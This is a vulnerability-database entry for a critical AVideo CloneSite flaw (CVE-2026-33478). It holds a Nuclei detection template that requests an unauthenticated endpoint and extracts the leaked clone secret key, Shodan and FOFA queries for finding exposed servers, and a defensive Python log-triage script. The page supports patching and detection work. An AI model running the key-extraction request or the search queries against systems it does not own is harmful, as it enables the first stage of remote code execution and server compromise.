AVideo <= 26.0 - WWBN AVideo - Remote Code Execution
CVE-2026-33478
Verified
Description
WWBN AVideo <= 26.0 contains multiple vulnerabilities in the CloneSite plugin including unauthenticated exposure of clone secret keys and OS command injection in rsync command construction, letting unauthenticated attackers achieve remote code execution.
Severity
Critical
Published Date
April 7, 2026
Template Author
pussycat0x
CVE-2026-33478.yaml
id: CVE-2026-33478

info:
  name: AVideo <= 26.0 - WWBN AVideo - Remote Code Execution
  author: pussycat0x
  severity: critical
  description: |
    WWBN AVideo <= 26.0 contains multiple vulnerabilities in the CloneSite plugin including unauthenticated exposure of clone secret keys and OS command injection in rsync command construction, letting unauthenticated attackers achieve remote code execution.
  impact: |
    Unauthenticated attackers can execute arbitrary system commands, leading to full server compromise.
  remediation: |
    Update to the version including commit c85d076375fab095a14170df7ddb27058134d38c or later.
  reference:
    - https://github.com/WWBN/AVideo/security/advisories/GHSA-687q-32c6-8x68
  metadata:
    max-request: 1
    verified: true
    shodan-query: http.html:"AVideo"
    fofa-query: app="AVideo-YouPHPTube"
  tags: cve,cve2026,avideo,clonesite,unauth,oss,vkev

http:
  - raw:
      - |
        GET /plugin/CloneSite/clones.json.php HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"data": ['
          - '"key":"'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: word
        part: body
        words:
          - '"error"'
          - "Admin required"
        negative: true
        condition: or

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: key
        group: 1
        part: body
        regex:
          - '"key":"([0-9a-z]+)"'
# digest: 4a0a0047304502205a81085a2319ec651de3bebae07fc8ec5d0632d7d32ad22dad3ef064d0ae1b71022100e0e1bee92f2bfc805b4ba7a2df4907333b87d8a1b8e9ad5f0af093a511875455:922c64590222798bb761d5b6d8e72950
Severity
9.5
Remediation Steps
Update to the version including commit c85d076375fab095a14170df7ddb27058134d38c or later.
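Log triage for the endpoint the template requests, as an added example that is not part of the template or of the AVideo project: it scans web server access logs for requests to /plugin/CloneSite/clones.json.php and lists the clients that received a 200 response with a body. The combined log format, the function names and the sample log lines are assumptions made for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Path taken from the template's raw request.
CLONES_PATH = "/plugin/CloneSite/clones.json.php"

# Assumed format: Apache/nginx "combined" access log. Adjust for other formats.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def find_clone_key_requests(lines):
    """Return {client_ip: [(timestamp, status, size), ...]} for hits on CLONES_PATH."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Compare the path only: drop the query string, decode %xx, collapse "//".
        path = re.sub(r"/+", "/", unquote(m["target"].split("?", 1)[0]))
        if path != CLONES_PATH:
            continue
        size = 0 if m["size"] == "-" else int(m["size"])
        hits[m["ip"]].append((m["ts"], int(m["status"]), size))
    return dict(hits)

def served_ok(hits):
    """Clients that got a 200 with a body. This is a candidate, not proof of key
    exposure: the template also excludes bodies containing "Admin required"."""
    return sorted(ip for ip, reqs in hits.items()
                  if any(status == 200 and size > 0 for _, status, size in reqs))

# Constructed sample lines using documentation IP ranges, not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Apr/2026:10:01:02 +0000] "GET /plugin/CloneSite/clones.json.php HTTP/1.1" 200 412 "-" "curl/8.5.0"',
    '198.51.100.4 - - [07/Apr/2026:10:05:40 +0000] "GET /plugin/CloneSite/clones.json.php?x=1 HTTP/1.1" 403 58 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [07/Apr/2026:10:06:11 +0000] "GET /view/img/logo.png HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip in served_ok(find_clone_key_requests(SAMPLE_LOG)):
        print(f"{ip}: clones.json.php answered 200 with a body; review this request")
```

Access logs do not record response bodies, so a flagged client still has to be checked against the installed version and the remediation commit above.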